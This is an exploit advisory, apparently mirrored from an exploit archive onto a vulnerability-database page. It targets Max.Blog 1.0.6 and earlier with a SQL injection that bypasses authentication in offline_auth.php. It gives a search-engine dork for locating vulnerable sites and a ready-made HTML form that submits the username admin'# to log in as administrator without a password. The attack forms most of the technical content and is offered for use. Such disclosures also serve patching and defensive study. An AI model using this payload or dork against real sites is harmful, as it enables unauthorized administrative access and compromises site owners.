Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21275
HistoryFeb 01, 2009 - 12:00 a.m.

Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass

2009-02-0100:00:00
vulners.com
65

################### Salvatore "drosophila" Fresta ###################

Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: * Offline Authentication Bypass
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: [email protected]

############################################################################

  • BUGS

Offline Authentication Bypass Exploit:

    Requisites: magic quotes = off

    File affected: offline_auth.php

    This bug allows a guest to bypass an offline authentication service
    using SQL Injection vulnerability.

############################################################################

  • CODE

<html>
<head>
<title>
Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
</title>
</head>
<body>
<form action="http://www.site.com/path/offline_auth.php&quot; method="POST">
<input type="text" name="username" value="admin'#" size="15">
<input type="hidden" name="password">
<input type="submit" value="Go!">
</form>
</body>
</html>

############################################################################


Salvatore "drosophila" Fresta
CWNP444351